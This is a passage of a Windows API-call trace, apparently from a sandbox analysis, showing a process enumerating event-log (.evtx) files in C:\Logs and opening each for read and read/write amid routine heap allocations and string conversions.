Size=0x70) returned 0x76278 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.985] AreFileApisANSI () returned 1 [0071.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a4b0 [0071.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0071.985] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.985] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0071.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.986] AreFileApisANSI () returned 1 [0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpUsedDefaultChar=0x0) returned 57 [0071.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.987] AreFileApisANSI () returned 1 [0071.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0071.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0071.987] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.987] GetFileType (hFile=0x410) returned 0x1 [0071.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.987] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.987] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.988] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.988] CloseHandle (hObject=0x410) returned 1 [0071.988] AreFileApisANSI () returned 1 [0071.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0071.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0071.988] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.988] GetFileType (hFile=0x410) returned 0x1 [0071.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0071.988] CloseHandle (hObject=0x410) returned 1 [0071.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.989] AreFileApisANSI () returned 1 [0071.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0071.989] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.989] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0071.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0071.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0071.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.990] AreFileApisANSI () returned 1 [0071.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0071.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0071.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.991] AreFileApisANSI () returned 1 [0071.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82958 [0071.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0071.991] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.991] GetFileType (hFile=0x410) returned 0x1 [0071.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0071.991] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.991] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.992] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.992] CloseHandle (hObject=0x410) returned 1 [0072.097] AreFileApisANSI () returned 1 [0072.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0072.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x825f8 [0072.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x825f8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0072.098] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.098] GetFileType (hFile=0x410) returned 0x1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x825f8 | out: hHeap=0x20000) returned 1 [0072.098] CloseHandle (hObject=0x410) returned 1 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0072.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.099] AreFileApisANSI () returned 1 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, 